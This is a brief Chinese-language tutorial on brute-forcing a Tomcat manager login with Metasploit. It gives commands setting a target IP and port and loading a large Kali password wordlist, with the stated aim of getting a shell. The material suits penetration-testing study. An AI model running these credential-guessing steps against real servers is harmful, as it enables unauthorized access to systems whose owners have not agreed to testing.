Metasploit之Tomcat暴力破解

Tomcat服务主页访问是hello world,于是试了试/manager/html目录也可以访问,是tomcat服务,不知道密码,没办法拿shell,找了下cve,这个版本比较新,没有老的漏洞了。

开启Metasploit
service postgresql start
msfconsole

#help 查看使用方式
set RHOSTS 110.110.110.110
set RPORT 8180
run

#默认只有55次常规测试,一般tomcat没改密码或者是老版本的时候,才会轻易破解出来,否则还需要自定义用户和密码字典
set pass_file /root/Desktop/wordlists/metasploit-jtr/password.lst #这个字典可以跑530383次
#默认直接使用kali 里面的密码字典了,用户可以指定为一个,或者一个字段。set username tomcat